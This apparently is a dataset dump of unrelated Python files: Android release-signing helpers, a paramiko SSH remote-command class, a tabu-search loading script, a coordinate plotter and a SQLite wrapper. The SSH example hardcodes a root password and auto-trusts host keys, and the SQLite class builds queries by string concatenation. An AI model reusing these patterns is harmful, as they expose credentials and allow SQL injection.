key_passwords.update(dict.fromkeys(no_passwords, None))
return key_passwords
def SignFile(input_name, output_name, key, password, align=None,
whole_file=False):
"""Sign the input_name zip/jar/apk, producing output_name. Use the
given key and password (the latter may be None if the key does not
  have a password).
If align is an integer > 1, zipalign is run to align stored files in
the output zip on 'align'-byte boundaries.
If whole_file is true, use the "-w" option to SignApk to embed a
signature that covers the whole file in the archive comment of the
zip file.
"""
if align == 0 or align == 1:
align = None
if align:
temp = tempfile.NamedTemporaryFile()
sign_name = temp.name
else:
sign_name = output_name
cmd = [OPTIONS.java_path, "-Xmx2048m", "-jar",
os.path.join(OPTIONS.search_path, OPTIONS.signapk_path)]
cmd.extend(OPTIONS.extra_signapk_args)
if whole_file:
cmd.append("-w")
cmd.extend([key + OPTIONS.public_key_suffix,
key + OPTIONS.private_key_suffix,
input_name, sign_name])
p = Run(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if password is not None:
password += "\n"
p.communicate(password)
if p.returncode != 0:
raise ExternalError("signapk.jar failed: return code %s" % (p.returncode,))
if align:
p = Run(["zipalign", "-f", str(align), sign_name, output_name])
p.communicate()
if p.returncode != 0:
raise ExternalError("zipalign failed: return code %s" % (p.returncode,))
temp.close()
def CheckSize(data, target, info_dict):
"""Check the data string passed against the max size limit, if
any, for the given target. Raise exception if the data is too big.
Print a warning if the data is nearing the maximum size."""
if target.endswith(".img"): target = target[:-4]
mount_point = "/" + target
if info_dict["fstab"]:
if mount_point == "/userdata": mount_point = "/data"
p = info_dict["fstab"][mount_point]
fs_type = p.fs_type
device = p.device
if "/" in device:
device = device[device.rfind("/")+1:]
limit = info_dict.get(device + "_size", None)
if not fs_type or not limit: return
if fs_type == "yaffs2":
# image size should be increased by 1/64th to account for the
# spare area (64 bytes per 2k page)
limit = limit / 2048 * (2048+64)
size = len(data)
pct = float(size) * 100.0 / limit
msg = "%s size (%d) is %.2f%% of limit (%d)" % (target, size, pct, limit)
if pct >= 99.0:
raise ExternalError(msg)
elif pct >= 95.0:
print
print " WARNING: ", msg
print
elif OPTIONS.verbose:
print " ", msg
def ReadApkCerts(tf_zip):
"""Given a target_files ZipFile, parse the META/apkcerts.txt file
and return a {package: cert} dict."""
certmap = {}
for line in tf_zip.read("META/apkcerts.txt").split("\n"):
line = line.strip()
if not line: continue
m = re.match(r'^name="(.*)"\s+certificate="(.*)"\s+'
r'private_key="(.*)"$', line)
if m:
name, cert, privkey = m.groups()
public_key_suffix_len = len(OPTIONS.public_key_suffix)
private_key_suffix_len = len(OPTIONS.private_key_suffix)
if cert in SPECIAL_CERT_STRINGS and not privkey:
certmap[name] = cert
elif (cert.endswith(OPTIONS.public_key_suffix) and
privkey.endswith(OPTIONS.private_key_suffix) and
cert[:-public_key_suffix_len] == privkey[:-private_key_suffix_len]):
certmap[name] = cert[:-public_key_suffix_len]
else:
raise ValueError("failed to parse line from apkcerts.txt:\n" + line)
return certmap
COMMON_DOCSTRING = """
-p (--path) <dir>
Prepend <dir>/bin to the list of places to search for binaries
run by this script, and expect to find jars in <dir>/framework.
-s (--device_specific) <file>
Path to the python module containing device-specific
releasetools code.
-x (--extra) <key=value>
Add a key/value pair to the 'extras' dict, which device-specific
extension code may look at.
-v (--verbose)
Show command lines being executed.
-h (--help)
Display this usage message and exit.
"""
def Usage(docstring):
print docstring.rstrip("\n")
print COMMON_DOCSTRING
def ParseOptions(argv,
docstring,
extra_opts="", extra_long_opts=(),
extra_option_handler=None):
"""Parse the options in argv and return any arguments that aren't
flags. docstring is the calling module's docstring, to be displayed
for errors and -h. extra_opts and extra_long_opts are for flags
defined by the caller, which are processed by passing them to
extra_option_handler."""
try:
opts, args = getopt.getopt(
argv, "hvp:s:x:" + extra_opts,
["help", "verbose", "path=", "signapk_path=", "extra_signapk_args=",
"java_path=", "public_key_suffix=", "private_key_suffix=",
"device_specific=", "extra="] +
list(extra_long_opts))
except getopt.GetoptError, err:
Usage(docstring)
print "**", str(err), "**"
sys.exit(2)
path_specified = False
for o, a in opts:
if o in ("-h", "--help"):
Usage(docstring)
sys.exit()
elif o in ("-v", "--verbose"):
OPTIONS.verbose = True
elif o in ("-p", "--path"):
OPTIONS.search_path = a
elif o in ("--signapk_path",):
OPTIONS.signapk_path = a
elif o in ("--extra_signapk_args",):
OPTIONS.extra_signapk_args = shlex.split(a)
elif o in ("--java_path",):
OPTIONS.java_path = a
elif o in ("--public_key_suffix",):
OPTIONS.public_key_suffix = a
elif o in ("--private_key_suffix",):
OPTIONS.private_key_suffix = a
elif o in ("-s", "--device_specific"):
OPTIONS.device_specific = a
elif o in ("-x", "--extra"):
key, value = a.split("=", 1)
OPTIONS.extras[key] = value
else:
if extra_option_handler is None or not extra_option_handler(o, a):
assert False, "unknown option \"%s\"" % (o,)
os.environ["PATH"] = (os.path.join(OPTIONS.search_path, "bin") +
os.pathsep + os.environ["PATH"])
return args
def Cleanup():
for i in OPTIONS.tempfiles:
if os.path.isdir(i):
shutil.rmtree(i)
else:
os.remove(i)
class PasswordManager(object):
def __init__(self):
self.editor = os.getenv("EDITOR", None)
self.pwfile = os.getenv("ANDROID_PW_FILE", None)
def GetPasswords(self, items):
"""Get passwords corresponding to each string in 'items',
returning a dict. (The dict may have keys in addition to the
values in 'items'.)
Uses the passwords in $ANDROID_PW_FILE if available, letting the
user edit that file to add more needed passwords. If no editor is
    available, or $ANDROID_PW_FILE isn't defined, prompts the user
interactively in the ordinary way.
"""
current = self.ReadFile()
first = True
while True:
missing = []
for i in items:
if i not in current or not current[i]:
missing.append(i)
# Are all the passwords already in the file?
if not missing: return current
for i in missing:
current[i] = ""
if not first:
print "key file %s still missing some passwords." % (self.pwfile,)
answer = raw_input("try to edit again? [y]> ").strip()
if answer and answer[0] not in 'yY':
raise RuntimeError("key passwords unavailable")
first = False
current = self.UpdateAndReadFile(current)
def PromptResult(self, current):
"""Prompt the user to enter a value (password) for each key in
    'current' whose value is false. Returns a new dict with all the
values.
"""
result = {}
for k, v in sorted(current.iteritems()):
if v:
result[k] = v
else:
while True:
result[k] = getpass.getpass("Enter password for %s key> "
% (k,)).strip()
if result[k]: break
return result
def UpdateAndReadFile(self, current):
if not self.editor or not self.pwfile:
return self.PromptResult(current)
f = open(self.pwfile, "w")
os.chmod(self.pwfile, 0600)
f.write("# Enter key passwords between the [[[ ]]] brackets.\n")
f.write("# (Additional spaces are harmless.)\n\n")
first_line = None
    entries = [(not v, k, v) for (k, v) in current.iteritems()]
    entries.sort()
    for i, (_, k, v) in enumerate(entries):
f.write("[[[ %s ]]] %s\n" % (v, k))
if not v and first_line is None:
# position cursor on first line with no password.
first_line = i + 4
f.close()
p = Run([self.editor, "+%d" % (first_line,), self.pwfile])
_, _ = p.communicate()
return self.ReadFile()
def ReadFile(self):
result = {}
if self.pwfile is None: return result
try:
f = open(self.pwfile, "r")
for line in f:
line = line.strip()
if not line or line[0] == '#': continue
m = re.match(r"^\[\[\[\s*(.*?)\s*\]\]\]\s*(\S+)$", line)
if not m:
print "failed to parse password file: ", line
else:
result[m.group(2)] = m.group(1)
f.close()
except IOError, e:
if e.errno != errno.ENOENT:
print "error reading password file: ", str(e)
return result
def ZipWriteStr(zip, filename, data, perms=0644):
# use a fixed timestamp so the output is repeatable.
zinfo = zipfile.ZipInfo(filename=filename,
date_time=(2009, 1, 1, 0, 0, 0))
zinfo.compress_type = zip.compression
zinfo.external_attr = perms << 16
zip.writestr(zinfo, data)
class DeviceSpecificParams(object):
module = None
def __init__(self, **kwargs):
"""Keyword arguments to the constructor become attributes of this
object, which is passed to all functions in the device-specific
module."""
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.extras = OPTIONS.extras
if self.module is None:
path = OPTIONS.device_specific
if not path: return
try:
if os.path.isdir(path):
info = imp.find_module("releasetools", [path])
else:
d, f = os.path.split(path)
b, x = os.path.splitext(f)
if x == ".py":
f = b
info = imp.find_module(f, [d])
self.module = imp.load_module("device_specific", *info)
except ImportError:
print "unable to load device-specific module; assuming none"
def _DoCall(self, function_name, *args, **kwargs):
"""Call the named function in the device-specific module, passing
the given args and kwargs. The first argument to the call will be
the DeviceSpecific object itself. If there is no module, or the
module does not define the function, return the value of the
'default' kwarg (which itself defaults to None)."""
if self.module is None or not hasattr(self.module, function_name):
return kwargs.get("default", None)
return getattr(self.module, function_name)(*((self,) + args), **kwargs)
def FullOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of a
full OTA package. Implementations can add whatever additional
assertions they like."""
return self._DoCall("FullOTA_Assertions")
def FullOTA_InstallBegin(self):
"""Called at the start of full OTA installation."""
return self._DoCall("FullOTA_InstallBegin")
def FullOTA_InstallEnd(self):
"""Called at the end of full OTA installation; typically this is
used to install the image for the device's baseband processor."""
return self._DoCall("FullOTA_InstallEnd")
def IncrementalOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of an
incremental OTA package. Implementations can add whatever
additional assertions they like."""
return self._DoCall("IncrementalOTA_Assertions")
def IncrementalOTA_VerifyBegin(self):
"""Called at the start of the verification phase of incremental
OTA installation; additional checks can be placed here to abort
the script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyBegin")
def IncrementalOTA_VerifyEnd(self):
"""Called at the end of the verification phase of incremental OTA
installation; additional checks can be placed here to abort the
script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyEnd")
def IncrementalOTA_InstallBegin(self):
"""Called at the start of incremental OTA installation (after
verification is complete)."""
return self._DoCall("IncrementalOTA_InstallBegin")
def IncrementalOTA_InstallEnd(self):
"""Called at the end of incremental OTA installation; typically
this is used to install the image for the device's baseband
processor."""
return self._DoCall("IncrementalOTA_InstallEnd")
class File(object):
def __init__(self, name, data):
self.name = name
self.data = data
self.size = len(data)
self.sha1 = sha1(data).hexdigest()
@classmethod
def FromLocalFile(cls, name, diskname):
f = open(diskname, "rb")
data = f.read()
f.close()
return File(name, data)
def WriteToTemp(self):
t = tempfile.NamedTemporaryFile()
t.write(self.data)
t.flush()
return t
def AddToZip(self, z):
ZipWriteStr(z, self.name, self.data)
DIFF_PROGRAM_BY_EXT = {
".gz" : "imgdiff",
".zip" : ["imgdiff", "-z"],
".jar" : ["imgdiff", "-z"],
".apk" : ["imgdiff", "-z"],
".img" : "imgdiff",
}
class Difference(object):
def __init__(self, tf, sf, diff_program=None):
self.tf = tf
self.sf = sf
self.patch = None
self.diff_program = diff_program
def ComputePatch(self):
"""Compute the patch (as a string of data) needed to turn sf into
tf. Returns the same tuple as GetPatch()."""
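    # imgdiff exploits the structure of image/zip-style files; bsdiff is the
    # generic byte-level fallback (see DIFF_PROGRAM_BY_EXT above).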
tf = self.tf
sf = self.sf
if self.diff_program:
diff_program = self.diff_program
else:
ext = os.path.splitext(tf.name)[1]
diff_program = DIFF_PROGRAM_BY_EXT.get(ext, "bsdiff")
ttemp = tf.WriteToTemp()
stemp = sf.WriteToTemp()
try:
ptemp = tempfile.NamedTemporaryFile()
if isinstance(diff_program, list):
cmd = copy.copy(diff_program)
else:
cmd = [diff_program]
cmd.append(stemp.name)
cmd.append(ttemp.name)
cmd.append(ptemp.name)
p = Run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, err = p.communicate()
if err or p.returncode != 0:
print "WARNING: failure running %s:\n%s\n" % (diff_program, err)
return None
diff = ptemp.read()
finally:
ptemp.close()
stemp.close()
ttemp.close()
self.patch = diff
return self.tf, self.sf, self.patch
def GetPatch(self):
"""Return a tuple (target_file, source_file, patch_data).
patch_data may be None if ComputePatch hasn't been called, or if
computing the patch failed."""
return self.tf, self.sf, self.patch
def ComputeDifferences(diffs):
"""Call ComputePatch on all the Difference objects in 'diffs'."""
print len(diffs), "diffs to compute"
# Do the largest files first, to try and reduce the long-pole effect.
by_size = [(i.tf.size, i) for i in diffs]
by_size.sort(reverse=True)
by_size = [i[1] for i in by_size]
lock = threading.Lock()
diff_iter = iter(by_size) # accessed under lock
def worker():
try:
lock.acquire()
for d in diff_iter:
lock.release()
start = time.time()
d.ComputePatch()
dur = time.time() - start
lock.acquire()
tf, sf, patch = d.GetPatch()
if sf.name == tf.name:
name = tf.name
else:
name = "%s (%s)" % (tf.name, sf.name)
if patch is None:
print "patching failed! %s" % (name,)
else:
print "%8.2f sec %8d / %8d bytes (%6.2f%%) %s" % (
dur, len(patch), tf.size, 100.0 * len(patch) / tf.size, name)
lock.release()
except Exception, e:
print e
raise
# start worker threads; wait for them all to finish.
threads = [threading.Thread(target=worker)
for i in range(OPTIONS.worker_threads)]
for th in threads:
th.start()
while threads:
threads.pop().join()
# map recovery.fstab's fs_types to mount/format "partition types"
PARTITION_TYPES = { "yaffs2": "MTD", "mtd": "MTD",
"ext4": "EMMC", "emmc": "EMMC" }
def GetTypeAndDevice(mount_point, info):
fstab = info["fstab"]
if fstab:
return PARTITION_TYPES[fstab[mount_point].fs_type], fstab[mount_point].device
else:
return None
def GetFex(name, path):
  if os.path.exists(path):
    fex = open(path)
    data = fex.read()
    fex.close()
    return File(name, data)
  else:
    print " %s does not exist " % (path,)
    return File(name, "")
def ParseCertificate(data):
"""Parse a PEM-format certificate."""
cert = []
save = False
for line in data.split("\n"):
if "--END CERTIFICATE--" in line:
break
if save:
cert.append(line)
if "--BEGIN CERTIFICATE--" in line:
save = True
cert = "".join(cert).decode('base64')
return cert
| [
"[email protected]"
] | |
ff632b330a5981db22ea60d8b5c3733208cdecb9 | 8034442a9778043b1d886220a3c928327b6297d4 | /common/ssh_fabric.py | ea533c2060adeb4fb30f0ffdc8d4832bf1b25f06 | [] | no_license | wangqian0818/auto_test | 5efe6d7b41ff01e6a9f10211674f55e195484a1c | 803a485d9720f090f7fa5d4482092cc4e7d9aa73 | refs/heads/master | 2023-08-24T01:27:40.956398 | 2021-11-02T02:12:14 | 2021-11-02T02:12:14 | 367,355,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,534 | py | #!/usr/bin/env python
# coding: utf-8
# @TIME : 2021/9/1 12:41
import paramiko
import sys
#
# reload(sys)
# sys.setdefaultencoding('utf8')
class Remote_Ops():
def __init__(self, hostname, ssh_port, username='', password=''):
self.hostname = hostname
self.ssh_port = ssh_port
self.username = username
self.password = password
    # method for logging in with a password
def ssh_connect_exec(self, cmd):
try:
ssh_key = paramiko.SSHClient()
ssh_key.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_key.connect(hostname=self.hostname, port=self.ssh_port, username=self.username, password=self.password,
timeout=10)
# paramiko.util.log_to_file('syslogin.log')
except Exception as e:
print('Connect Error:ssh %s@%s: %s' % (self.username, self.hostname, e))
exit()
stdin, stdout, stderr = ssh_key.exec_command(cmd, get_pty=True)
        # switch to root
stdin.write(self.password + '\n')
stdin.flush()
err_list = stderr.readlines()
if len(err_list) > 0:
print('ERROR:' + err_list[0])
exit()
# print stdout.read()
for item in stdout.readlines()[2:]:
print(item.strip())
ssh_key.close()
    # method for logging in with an SSH key file
def ssh_connect_keyfile_exec(self, file_name, cmd):
try:
ssh_key = paramiko.SSHClient()
ssh_key.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_key.connect(hostname=self.hostname, port=self.ssh_port, key_filename=file_name, timeout=10)
# paramiko.util.log_to_file('syslogin.log')
except Exception as e:
print(e)
exit()
stdin, stdout, stderr = ssh_key.exec_command(cmd)
err_list = stderr.readlines()
if len(err_list) > 0:
print('ERROR:' + err_list[0])
exit()
for item in stdout.readlines():
print(item.strip())
ssh_key.close()
if __name__ == '__main__':
    # example: password-based login
test = Remote_Ops('10.10.88.13', 22, 'root', '1q2w3e')
test.ssh_connect_exec('/usr/local/bin/jsac-read-db-num.sh /etc/jsac/agentjsac.new.db ipv4acl')
    # example: SSH-key login (must be run as root)
# file_name = '/var/root/.ssh/id_rsa'
# test1 = Remote_Ops('10.211.55.11', 22)
# test1.ssh_connect_keyfile_exec(file_name, 'apt-get update') | [
"[email protected]"
] | |
1760d67abcc3ecccc8485bfdfcd5101b5ad55194 | f3931179f52c7ef67fd56213fdb774f4f125731f | /Graph-InfoClust-GIC经典思路版本/kubao/tabu.py | 608e22d329ac6b369690e47e34681ff164876473 | [] | no_license | zhangbo2008/graph_research_latest | bb5e1c0d34cbed6675e5bcbfa7cc2502259cc15c | c6c363532226554429b14d09ecaaf8eeffd9c31e | refs/heads/main | 2023-03-29T15:52:20.869773 | 2021-04-06T03:06:47 | 2021-04-06T03:06:47 | 355,040,351 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,286 | py | import heapq  # Library for array sorting https://docs.python.org/2/library/heapq.html
import time
import numpy as np
import math
import pandas as pd
from Solution import Solution
from input import Input
def Write2Excel(results):
    solution = pd.DataFrame(results, columns=['Box Type', 'Box Orientation in Block', 'Box Quantity in Block', 'Box Priority', 'Block Starting Point', 'Length', 'Width', 'Height'])
    solution.to_excel('loading heuristic results (Tabu).xlsx')
return
def Tabu_search( Initial_Sol,alpha , beta , gamma ,tabu_size, max_iterations=300, max_solutions=10 , MaxRunTime=60):
start=time.time() # start the timer
Solution_list = [ (-1*Initial_Sol.Score_Calc(Data, alpha , beta , gamma)[0], Initial_Sol) ]
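    # heapq is a min-heap, so scores are stored negated: popping yields the best solution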
current_Sol= Solution(None) #init for while loop
Best_Sol=Solution(None)
tabu_set = []
it=1
# Main Loop
while it<= max_iterations and time.time() <= start+MaxRunTime:
# Select the solution with minimal score
_ , current_Sol = heapq.heappop( Solution_list )
# if the current solution is better than best solution so far change the best solution
if current_Sol.h_score>Best_Sol.h_score:
Best_Sol=current_Sol
Best_Sol.Score_Calc(Data, alpha , beta , gamma)
#print current_Sol.VU, len(Solution_list)
# genearting new solutions
for Sol,rep in current_Sol.generate_children(6):
# Check if the move is in Tabu list or not
if rep not in tabu_set:
tabu_set = [rep] + tabu_set[:tabu_size-1]
heapq.heappush( Solution_list, (-1*Sol.Score_Calc(Data, alpha , beta , gamma)[0],Sol)) # Add the new solution into the solution list
# Maintain a fix lenght for the solution list
Solution_list = Solution_list[:max_solutions]
it+=1
return (Best_Sol, time.time()-start)
alpha , beta , gamma = 1 , 0 , 0
times=[3,5,10,15,30,60]
filenumbers=[1,2,3,4,5,6,7]
instances=[2,10,15,22,33,45,52,63,78,84]
Final_results=np.zeros((6,7))
for t,T in enumerate(times):
for f,FN in enumerate(filenumbers):
VU=[]
for PN in instances:
Data=Input(FN,PN)
#Data.RandomData(40)
MaxRunTime=T
tabulist_size=int(math.ceil(float(Data.ntype)/2))
max_solutions=2*Data.ntype
    Initial_sol = Solution(range(Data.ntype))  # give a starting solution
# Apply the Tabu
(Best_Sol,Runtime )=Tabu_search( Initial_sol ,alpha , beta , gamma,
tabulist_size, max_solutions=max_solutions ,MaxRunTime=MaxRunTime )
print('Volume Utilization = %f ' %Best_Sol.VU)
VU.append(Best_Sol.VU)
Final_results[t,f]=np.mean(VU)
#print'Best Solution= ' ,Best_Sol.value #,100-Best_Sol.h_score)
#print('Volume Utilization = %f ' %Best_Sol.VU)
#print('Wieght distrbution measure= %f' %Best_Sol.WCG)
#print('Distance from back measure= %f where the maximum is %f' %(Best_Sol.DFF,Solution.max_DFF()))
#print('Run Time = %f sec' %Runtime)
#print('Total number of loaded boxes = %f' %Best_Sol.Total_Box_Number(Data))
#Write2Excel(Best_Sol.Loading_Results)
| [
"[email protected]"
] | |
a5cdcc75d5b039b2168a0c913f6cf22289e0757f | b7b122b7b9c35ec2f191021c3396f4790f023ed3 | /03_用列表存储的坐标_数据采集/readCSVcoordi.py | 622779a136e79f433a8d576a0b5abcfa206a0129 | [
"MIT"
] | permissive | l5d1l5/python-urbanPlanning | e7fe413441aea7df94765062fe14d331a6e0006a | f22e5b561a55ac2263aa96e8e9aff155b0aae1fd | refs/heads/master | 2020-06-22T09:54:54.895918 | 2019-06-18T02:22:14 | 2019-06-18T02:22:14 | 197,694,260 | 0 | 2 | MIT | 2019-07-19T03:19:41 | 2019-07-19T03:19:40 | null | UTF-8 | Python | false | false | 702 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 12 23:30:43 2017
@author: RichieBao-caDesign设计(cadesign.cn)
"""
import csv
import numpy as np
import matplotlib.pyplot as plt
filePath=r"D:/MUBENAcademy/pythonSystem/code/baiduMapPoiLandscape.csv"
f=open(filePath)
csvReader=csv.reader(f)
coordi=[]
for row in csvReader:
if row:
#coordi.append(eval(row[1]))
#coordi.append(eval(row[2]))
#coordi.append(row[0])
        coordi.append((float(row[1]), float(row[2])))
#print(coordi)
coordiArray=np.array(coordi)
print(coordiArray[:,0])
plt.plot(coordiArray[:,0],coordiArray[:,1],'ro',markersize=5)
plt.xlabel('lng')
plt.ylabel('lat')
plt.show()
f.close() | [
"[email protected]"
] | |
ae0668ec7b7478809134331aac6cbe81d5b756f5 | 2b9ac87d509ffeca59e46a2fc3373214b0c4bb98 | /StockAnalysisSystem/core/Database/SqlRw.py | 5543c04fc8aae7099369a5fa3d3769fc8a7d37a2 | [
"Apache-2.0"
] | permissive | lifg2000/StockAnalysisSystem | d94023dbb22db11d664700229ae28afed98bebc1 | b0bef50f5c1a9565e1a1f953fedbe7821601147c | refs/heads/master | 2023-03-09T08:13:59.675491 | 2021-02-22T13:48:42 | 2021-02-22T13:48:42 | 309,856,804 | 0 | 0 | Apache-2.0 | 2021-02-22T13:48:43 | 2020-11-04T02:06:38 | null | UTF-8 | Python | false | false | 11,691 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
@version:
author:Sleepy
@time: 2019/01/08
@file: SqlRw.py
@function:
@modify:
"""
import sqlite3
import traceback
import numpy as np
import pandas as pd
SQL_QUERY_TABLE_COLUMN = '''SELECT p.name as ColumnName
FROM sqlite_master m
left outer join pragma_table_info((m.name)) p
on m.name <> p.name
WHERE m.name = '<<table_name>>'
;'''
class SqlAccess:
def __init__(self, db: str = 0, user: str = '', password: str = '', extra: str = ''):
self.__db_name = db
self.__user_name = user
self.__password = password
self.__extra = extra
def init(self, db: str = 0, user: str = '', password: str = '', extra: str = '') -> bool:
self.__db_name = db
self.__user_name = user
self.__password = password
self.__extra = extra
return True
def GetDatabaseName(self):
return self.__db_name
# ----------------------------------- connection and cursor -----------------------------------
def BuildConnection(self) -> sqlite3.Connection:
if len(self.__db_name) == 0:
return None
try:
return sqlite3.connect(self.__db_name)
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
return None
finally:
pass
def BuildConnectionCursor(self) -> (sqlite3.Connection, sqlite3.Cursor):
connection = self.BuildConnection()
if connection is None:
return None, None
cursor = connection.cursor()
if cursor is None:
connection.close()
return None, None
return connection, cursor
# ----------------------------------- Safe Execute -----------------------------------
# Data Description Language: Table
def SafeExecuteDDL(self, sql_ddl: str, connection: sqlite3.Connection) -> bool:
if connection is None:
return False
try:
connection.execute(sql_ddl)
connection.commit()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
return False
finally:
pass
return True
# Data Manipulation Language: SELECT, UPDATE, DELETE, INSERT INTO
def SafeExecuteDML(self, sql_dml: str, cursor: sqlite3.Cursor) -> bool:
if cursor is None:
return False
try:
cursor.execute(sql_dml)
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
return False
finally:
pass
return True
# ----------------------------------- Quick Execute -----------------------------------
def QuickExecuteDDL(self, sql_ddl: str) -> bool:
connection = self.BuildConnection()
if connection is not None:
ret = self.SafeExecuteDDL(sql_ddl, connection)
connection.close()
return ret
return False
def QuickExecuteDML(self, sql_dml: str, commit: bool = False) -> bool:
connection, cursor = self.StartExecuteDML(sql_dml)
if cursor is None and connection is None:
return False
if commit:
connection.commit()
cursor.close()
connection.close()
return True
def StartExecuteDML(self, sql_dml: str) -> (sqlite3.Connection, sqlite3.Cursor):
connection, cursor = self.BuildConnectionCursor()
if cursor is None:
return None, None
try:
cursor.execute(sql_dml)
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
cursor.close()
connection.close()
return None, None
finally:
pass
return connection, cursor
# ----------------------------------- Advance DDL -----------------------------------
def TableExists(self, table_name: str) -> bool:
sql = "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='" + table_name + "'"
connection, cursor = self.StartExecuteDML(sql)
if cursor is None:
return False
b = cursor.fetchall()
existence = (b[0][0] == 1)
cursor.close()
connection.close()
return existence
def CreateTable(self, table_name: str, table_desc: [[str, str]]) -> bool:
fields = ''
for pair in table_desc:
if len(pair) < 2:
return False
if fields != '':
fields += ', '
fields += pair[0] + ' ' + pair[1]
sql = 'CREATE TABLE IF NOT EXISTS ' + table_name + ' (' + fields + ');'
return self.QuickExecuteDDL(sql)
def DropTable(self, table_name: str) -> bool:
return self.QuickExecuteDDL('DROP TABLE ' + table_name)
def GetTableColumns(self, table_name: str) -> list:
        sql = SQL_QUERY_TABLE_COLUMN.replace('<<table_name>>', table_name)
        connection, cursor = self.StartExecuteDML(sql)
if cursor is not None:
columns = cursor.fetchall()
columns = [c[0] for c in columns]
cursor.close()
else:
columns = []
if connection is not None:
connection.close()
return columns
# ----------------------------------- Advance DML -----------------------------------
def ExecuteSelect(self, table_name: str, columns: [str], condition: str = '') -> (sqlite3.Connection, sqlite3.Cursor):
sql = self.__gen_sql_select(table_name, columns, condition)
return self.StartExecuteDML(sql)
def ExecuteUpdate(self, table_name: str, update_column: map, condition: str = '') -> bool:
sql = self.__gen_sql_update(table_name, update_column, condition)
return self.QuickExecuteDML(sql, True)
# For safety, condition is required.
def ExecuteDelete(self, table_name: str, condition: str) -> bool:
if condition == '':
return False
sql = 'DELETE FROM ' + table_name + ' WHERE ' + condition
return self.QuickExecuteDML(sql, True)
def ExecuteInsertInto(self, table_name: str, insert_column: map) -> bool:
sql = self.__gen_sql_insert_into(table_name, insert_column)
return self.QuickExecuteDML(sql, True)
def ExecuteUpdateOrInsert(self, table_name: str, insert_column: map, key_columns: [str]) -> bool:
        columns, values = self.__gen_insert_pairs(insert_column)
        sql_insert = 'INSERT OR IGNORE INTO ' + table_name + ' (' + columns + ') VALUES (' + values + ')'
        condition = ''
        for c in key_columns:
            if c not in insert_column.keys():
                return False
            if condition != '':
                condition += ' AND '
            condition += c + " = '" + insert_column.get(c, '') + "'"
        sql_update = self.__gen_sql_update(table_name, insert_column, condition)
        # sqlite3 executes one statement per call, so run the INSERT and UPDATE separately
        return (self.QuickExecuteDML(sql_insert, True) and
                self.QuickExecuteDML(sql_update, True))
# ----------------------------------- Structure Write -----------------------------------
def ListToDB(self, table_name: str, list_: list, rows: int, cols: int, columns: [str] = None) -> bool:
df = pd.DataFrame(np.array(list_).reshape(rows, cols))
if columns is not None:
df.columns = columns
return self.DataFrameToDB(table_name, df)
def DictToDB(self, table_name: str, dict_: dict, columns: [str] = None) -> bool:
df = pd.DataFrame(list(dict_.items()), columns=columns)
return self.DataFrameToDB(table_name, df)
def DataFrameToDB(self, table_name: str, df: pd.DataFrame, if_exists: str = 'replace') -> bool:
connection, cursor = self.BuildConnectionCursor()
if cursor is None:
return False
try:
df.to_sql(table_name, connection, if_exists=if_exists, index=False)
except Exception as e:
print('DataFrameToDB Fail.')
print(e)
print(traceback.format_exc())
return False
finally:
connection.commit()
cursor.close()
connection.close()
return True
# ----------------------------------- Structure Read -----------------------------------
def ListFromDB(self, table_name: str, columns: [str], condition: str = '') -> [()]:
connection, cursor = self.ExecuteSelect(table_name, columns, condition)
if cursor is None:
return None
values = cursor.fetchall()
cursor.close()
connection.close()
return values
def DictFromDB(self, table_name, columns: [str], condition: str = '') -> dict:
connection, cursor = self.ExecuteSelect(table_name, columns, condition)
if cursor is None:
return None
values = cursor.fetchall()
cursor.close()
connection.close()
dict_ = {}
for key, val in values:
dict_[key] = val
return dict_
def DataFrameFromDB(self, table_name: str, columns: [str] = [], condition: str = '') -> pd.DataFrame:
sql = self.__gen_sql_select(table_name, columns, condition)
connection = self.BuildConnection()
if connection is None:
return None
try:
return pd.read_sql_query(sql, connection)
except Exception as e:
print(e)
finally:
connection.close()
return None
# ============================================ File operation ============================================
def ExportTable(self, table_name: str, file_name: str) -> bool:
df = self.DataFrameFromDB(table_name)
        if df is None:
            return False
df.to_csv(file_name)
return True
# ============================================ Generate SQL ============================================
def __gen_sql_select(self, table_name: str, columns: [str], condition: str = '') -> str:
if columns is None or len(columns) == 0:
sql = 'select * from ' + table_name
else:
sql = 'select ' + ', '.join(columns) + ' from ' + table_name
if len(condition) != 0:
sql += ' where ' + condition
return sql
def __gen_sql_update(self, table_name: str, update_column: map, condition: str = '') -> str:
if update_column is None or len(update_column) == 0:
return ''
sql = 'UPDATE ' + table_name + ' SET '
sql += self.__gen_update_pairs(update_column)
if condition != '':
            sql += ' WHERE ' + condition
return sql
def __gen_sql_insert_into(self, table_name: str, insert_column: map) -> str:
if insert_column is None or len(insert_column) == 0:
return ''
columns, values = self.__gen_insert_pairs(insert_column)
return 'INSERT INTO ' + table_name + ' (' + columns + ') VALUES (' + values + ')'
def __gen_update_pairs(self, update_column: map) -> str:
sql = ''
for k in update_column.keys():
sql += k + " = '" + update_column.get(k) + "', "
if sql.endswith(', '):
sql = sql[0:-2]
return sql
def __gen_insert_pairs(self, insert_column: map) -> (str, str):
columns = values = ''
for k in insert_column.keys():
columns += k + ', '
values += "'" + insert_column.get(k) + "', "
if columns.endswith(', '):
columns = columns[0:-2]
if values.endswith(', '):
values = values[0:-2]
return columns, values
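# Minimal usage sketch; 'demo.db', the 'person' table and its columns are
# made-up example names, not part of the original project:
if __name__ == '__main__':
    dao = SqlAccess('demo.db')
    dao.CreateTable('person', [['name', 'TEXT'], ['age', 'INTEGER']])
    dao.ExecuteInsertInto('person', {'name': 'alice', 'age': '30'})
    print(dao.ListFromDB('person', ['name', 'age']))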
| [
"[email protected]"
] | |
